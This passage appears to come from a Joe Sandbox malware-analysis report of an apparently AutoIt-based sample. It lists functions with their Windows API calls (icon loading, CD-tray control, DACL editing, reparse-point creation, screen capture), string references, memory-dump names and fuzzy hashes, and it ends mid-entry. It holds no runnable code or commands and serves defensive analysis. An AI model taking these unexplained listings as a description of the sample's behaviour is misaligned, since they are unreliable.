ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006FE4EF
DestroyCursor.USER32(?), ref: 006FE4FE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006FE51B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006FE527

Part of subcall function 006B1BC7: __wcsicmp_l.LIBCMT ref: 006B1C50

Strings

.icl, xrefs: 006FE331
.dll, xrefs: 006FE374
.exe, xrefs: 006FE351

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 3907162815-1154884017
Opcode ID: 67d538f8652f1ed5835f23f499d41541ecb3f268d21bc3e1fafebbead5628d32
Instruction ID: 5841f87a0b738548e565b74ec6059bb9c0959c3956ca474f46d708482ce9d90a
Opcode Fuzzy Hash: 67d538f8652f1ed5835f23f499d41541ecb3f268d21bc3e1fafebbead5628d32
Instruction Fuzzy Hash: D761C3B1540219BEDB24DF68CC45FFA7BAABB09710F108119FA11E71E0DB799D80CB60

Function 006E0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 006E0EFF
SystemTimeToFileTime.KERNEL32(?,?), ref: 006E0F0F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006E0F1B
__wsplitpath.LIBCMT ref: 006E0F79
_wcscat.LIBCMT ref: 006E0F91
_wcscat.LIBCMT ref: 006E0FA3
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 006E0FB8
SetCurrentDirectoryW.KERNEL32(?), ref: 006E0FCC
SetCurrentDirectoryW.KERNEL32(?), ref: 006E0FFE
SetCurrentDirectoryW.KERNEL32(?), ref: 006E101F
_wcscpy.LIBCMT ref: 006E102B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 006E106A

Strings

*.*, xrefs: 006E1025

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 09e83392c6d5e09f1ad846d8c79f66e8fbb7589554c71c643660eaf4eed54892
Instruction ID: 8b4aec5cfaa715f051a12cccc97d9eb7669d9eabd46806140c87ffa310d622e9
Opcode Fuzzy Hash: 09e83392c6d5e09f1ad846d8c79f66e8fbb7589554c71c643660eaf4eed54892
Instruction Fuzzy Hash: 43618FB2504345AFDB10EF24C8449DEB3EAFF89310F00891EF99987251EB35EA45CB96

Function 006DDAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 006984A6: __swprintf.LIBCMT ref: 006984E5
Part of subcall function 006984A6: __itow.LIBCMT ref: 00698519

CharLowerBuffW.USER32(?,?), ref: 006DDB26
GetDriveTypeW.KERNEL32 ref: 006DDB73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006DDBBB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006DDBF2
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006DDC20

Part of subcall function 00697E53: _memmove.LIBCMT ref: 00697EB9

Strings

open , xrefs: 006DDB82
open, xrefs: 006DDB4D
closed, xrefs: 006DDB3A, 006DDB43
close cd wait, xrefs: 006DDC0B
type cdaudio alias cd wait, xrefs: 006DDB9E
set cd door , xrefs: 006DDBC1
close, xrefs: 006DDB2C
wait, xrefs: 006DDBDD

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 59f70462e343666000c0c4774b6f1447822fdf2902e0c4df210e876f73d2d160
Instruction ID: 3060e0d8741b777a684dddd2ea393d366e34892c171434b9e3a39c67755781e1
Opcode Fuzzy Hash: 59f70462e343666000c0c4774b6f1447822fdf2902e0c4df210e876f73d2d160
Instruction Fuzzy Hash: 92516BB15043059FCB40EF14C89196AB7FAFF88758F00886DF899976A1DB31EE05CB46

Function 006D3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00704085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 006D3145
LoadStringW.USER32(00000000,?,00704085,00000016), ref: 006D314E

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00704085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 006D3170
LoadStringW.USER32(00000000,?,00704085,00000016), ref: 006D3173
__swprintf.LIBCMT ref: 006D31B3
__swprintf.LIBCMT ref: 006D31C5
_wprintf.LIBCMT ref: 006D326C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 006D3283

Strings

^ ERROR, xrefs: 006D3216
Line %d (File "%s"):, xrefs: 006D31BF
%s (%d) : ==> %s: %s %s, xrefs: 006D3267
Line %d:, xrefs: 006D31AD
Error: , xrefs: 006D323C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 0e31504038fc97b57069ac160b1cec22ef4ae70bd66a1c8a1caf26cc96973f23
Instruction ID: 286e7fd49a855e2e0d18bb6bbf6d0dcf8d6cde6b7e76729af9f2960ff9a950f4
Opcode Fuzzy Hash: 0e31504038fc97b57069ac160b1cec22ef4ae70bd66a1c8a1caf26cc96973f23
Instruction Fuzzy Hash: B14181B1D00219AACF54FB90DD96EEEB77EAF14700F10406AF205B2192EA656F04CB65

Function 006DD950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 006DD96C
__swprintf.LIBCMT ref: 006DD98E
CreateDirectoryW.KERNEL32(?,00000000), ref: 006DD9CB
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006DD9F0
_memset.LIBCMT ref: 006DDA0F
_wcsncpy.LIBCMT ref: 006DDA4B
DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 006DDA80
CloseHandle.KERNEL32(00000000), ref: 006DDA8B
RemoveDirectoryW.KERNEL32(?), ref: 006DDA94
CloseHandle.KERNEL32(00000000), ref: 006DDA9E

Strings

:, xrefs: 006DD9AF
\, xrefs: 006DD9A4
\??\%s, xrefs: 006DD988

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 7f2c1229387d8c3168b3aa81cd18136d825cdac85c021b1784b5faea031409fd
Instruction ID: 0b8ec48208b3eeeb04984f08653610fe44c427dbbc4e6c55df40e871df6e2645
Opcode Fuzzy Hash: 7f2c1229387d8c3168b3aa81cd18136d825cdac85c021b1784b5faea031409fd
Instruction Fuzzy Hash: 5E31B671A00208AADB20EFA4DC49FDA77BDBF84700F04C1A6F519D61A0E7759A858FA5

Function 006FE541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,006FBD04,?,?), ref: 006FE564
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,006FBD04,?,?,00000000,?), ref: 006FE57B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,006FBD04,?,?,00000000,?), ref: 006FE586
CloseHandle.KERNEL32(00000000,?,?,?,?,006FBD04,?,?,00000000,?), ref: 006FE593
GlobalLock.KERNEL32(00000000), ref: 006FE59C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,006FBD04,?,?,00000000,?), ref: 006FE5AB
GlobalUnlock.KERNEL32(00000000), ref: 006FE5B4
CloseHandle.KERNEL32(00000000,?,?,?,?,006FBD04,?,?,00000000,?), ref: 006FE5BB
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006FE5CC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0071D9BC,?), ref: 006FE5E5
GlobalFree.KERNEL32(00000000), ref: 006FE5F5
GetObjectW.GDI32(00000000,00000018,?), ref: 006FE619
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 006FE644
DeleteObject.GDI32(00000000), ref: 006FE66C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006FE682

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 635acdf6acd0aa8e495c89d6bcaa838538510c38c5ca73cc0f937abc919fc7cb
Instruction ID: f1f9048758cef7aca2933fa481197593e35d26e70bc18ac205b1eb6bfbb4fd67
Opcode Fuzzy Hash: 635acdf6acd0aa8e495c89d6bcaa838538510c38c5ca73cc0f937abc919fc7cb
Instruction Fuzzy Hash: 89413875600208BFDB219F69CC48EEA7BB9EB89715F10C058FA06D72A0D7769D01DF24

Function 006E0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 006E0C93
_wcscat.LIBCMT ref: 006E0CAB
_wcscat.LIBCMT ref: 006E0CBD
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 006E0CD2
SetCurrentDirectoryW.KERNEL32(?), ref: 006E0CE6
GetFileAttributesW.KERNEL32(?), ref: 006E0CFE
SetFileAttributesW.KERNEL32(?,00000000), ref: 006E0D18
SetCurrentDirectoryW.KERNEL32(?), ref: 006E0D2A

Strings

*.*, xrefs: 006E0D69

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: b43d3e1c80381d4daa3defa34d23d1803ff189fa972dbba9e403a47b5114992c
Instruction ID: 4367d043f4705f874c0cd0eb9178c058c3fd26c5eeee35d698ebae698acfe613
Opcode Fuzzy Hash: b43d3e1c80381d4daa3defa34d23d1803ff189fa972dbba9e403a47b5114992c
Instruction Fuzzy Hash: F881C1B15053859FDB60DF69C8409AAB3EABF88710F24892EF885C7250E774EDC5CB52

Function 006CB593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006CB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 006CB903
Part of subcall function 006CB8E7: GetLastError.KERNEL32(?,006CB3CB,?,?,?), ref: 006CB90D
Part of subcall function 006CB8E7: GetProcessHeap.KERNEL32(00000008,?,?,006CB3CB,?,?,?), ref: 006CB91C
Part of subcall function 006CB8E7: RtlAllocateHeap.NTDLL(00000000,?,006CB3CB), ref: 006CB923
Part of subcall function 006CB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 006CB93A

Part of subcall function 006CB982: GetProcessHeap.KERNEL32(00000008,006CB3E1,00000000,00000000,?,006CB3E1,?), ref: 006CB98E
Part of subcall function 006CB982: RtlAllocateHeap.NTDLL(00000000,?,006CB3E1), ref: 006CB995
Part of subcall function 006CB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006CB3E1,?), ref: 006CB9A6

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006CB5F7
_memset.LIBCMT ref: 006CB60C
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006CB62B
GetLengthSid.ADVAPI32(?), ref: 006CB63C
GetAce.ADVAPI32(?,00000000,?), ref: 006CB679
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006CB695
GetLengthSid.ADVAPI32(?), ref: 006CB6B2
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006CB6C1
RtlAllocateHeap.NTDLL(00000000), ref: 006CB6C8
GetLengthSid.ADVAPI32(?,00000008,?), ref: 006CB6E9
CopySid.ADVAPI32(00000000), ref: 006CB6F0
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006CB721
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006CB747
SetUserObjectSecurity.USER32(?,00000004,?), ref: 006CB75B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: 876f9a821076284fae6bb2e43ed9e98fdcd529d2623f974f600228ff2549b0b2
Instruction ID: bcd43dcddb83a478efec9e6426da5f281299f2d108445d24332e147e5c18e773
Opcode Fuzzy Hash: 876f9a821076284fae6bb2e43ed9e98fdcd529d2623f974f600228ff2549b0b2
Instruction Fuzzy Hash: 4F515971900209ABDF109FA4DC86EFEBB7AFF48300F04816DE915E6290DB389A05CF64

Function 006EA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 006EA2DD
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 006EA2E9
CreateCompatibleDC.GDI32(?), ref: 006EA2F5
SelectObject.GDI32(00000000,?), ref: 006EA302
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 006EA356
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 006EA392
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 006EA3B6
SelectObject.GDI32(00000006,?), ref: 006EA3BE
DeleteObject.GDI32(?), ref: 006EA3C7
DeleteDC.GDI32(00000006), ref: 006EA3CE
ReleaseDC.USER32(00000000,?), ref: 006EA3D9

Strings

(, xrefs: 006EA37E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: e0bf23971648116c23c0f1c00d5b42e2fe246c69eec1fcf19d346daaafb41801
Instruction ID: 86bf2b53e4976a98c9dd808cec61fbc7968baf35bed8cbbd312c22acce7b99a7
Opcode Fuzzy Hash: e0bf23971648116c23c0f1c00d5b42e2fe246c69eec1fcf19d346daaafb41801
Instruction Fuzzy Hash: 77514975900349AFDB24CFA9C884AEEBBBAEF48310F14C41DF996A7250C735AD418B54

Function 006F3AF7 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,006F2AA6,?,?), ref: 006F3B0E

Strings

HKCU, xrefs: 006F3BE4
|Et, xrefs: 006F3B27
HKEY_CURRENT_CONFIG, xrefs: 006F3BB1
HKEY_LOCAL_MACHINE, xrefs: 006F3B5D
HKCC, xrefs: 006F3BC2
HKCR, xrefs: 006F3B9C
HKEY_USERS, xrefs: 006F3BF5
HKEY_CLASSES_ROOT, xrefs: 006F3B87
HKU, xrefs: 006F3C06
HKLM, xrefs: 006F3B72
HKEY_CURRENT_USER, xrefs: 006F3BD3

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|Et
API String ID: 3964851224-2164692596
Opcode ID: 28c93478cb97aaace130488a278373760a7c9c233c2494d911d9e2b3420948cd
Instruction ID: ff10b95559b995f9b4bf08a5bcbc18015b1820d5f084bc5d5a15b032e940d1bd
Opcode Fuzzy Hash: 28c93478cb97aaace130488a278373760a7c9c233c2494d911d9e2b3420948cd
Instruction Fuzzy Hash: 9F419E3414025A8BCF44EF44D841BFA3367AF16390F144838ED615B395DB389E1ADB65

Function 006D32B0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00703C64,00000010,00000000,Bad directive syntax error,0072DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 006D32D1
LoadStringW.USER32(00000000,?,00703C64,00000010), ref: 006D32D8

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

_wprintf.LIBCMT ref: 006D3309
__swprintf.LIBCMT ref: 006D332B
MessageBoxW.USER32(00000000,?,?,00011010), ref: 006D3395

Strings

"u, xrefs: 006D3338, 006D3322, 006D32FE
%s (%d) : ==> %s.: %s %s, xrefs: 006D3304
Line %d (File "%s"):, xrefs: 006D333B
Error: , xrefs: 006D3363
Line %d:, xrefs: 006D3325
., xrefs: 006D337B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"u
API String ID: 1506413516-3007340126
Opcode ID: 6b88016837f81fec4099b67155a0acb827c1d483ed675c80505b641ddf642abe
Instruction ID: 4b2171e3b3bebce0e2442e7ea8e977034c15cd40acfe9ed1ca5c83ce68fe651b
Opcode Fuzzy Hash: 6b88016837f81fec4099b67155a0acb827c1d483ed675c80505b641ddf642abe
Instruction Fuzzy Hash: 00217F7184032AFBCF51AF90CC06EEE777ABF18700F00445AF515A11A1EB7AAA54DB55

Function 006DD520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 006DD567

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

LoadStringW.USER32(?,?,00000FFF,?), ref: 006DD589
__swprintf.LIBCMT ref: 006DD5DC
_wprintf.LIBCMT ref: 006DD68D
_wprintf.LIBCMT ref: 006DD6AB

Strings

^ ERROR, xrefs: 006DD631
Line %d (File "%s"):, xrefs: 006DD5D6
"%s" (%d) : ==> %s:, xrefs: 006DD6A6
"%s" (%d) : ==> %s:%s%s, xrefs: 006DD688
Error: , xrefs: 006DD657

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: LoadString_wprintf$__swprintf_memmove
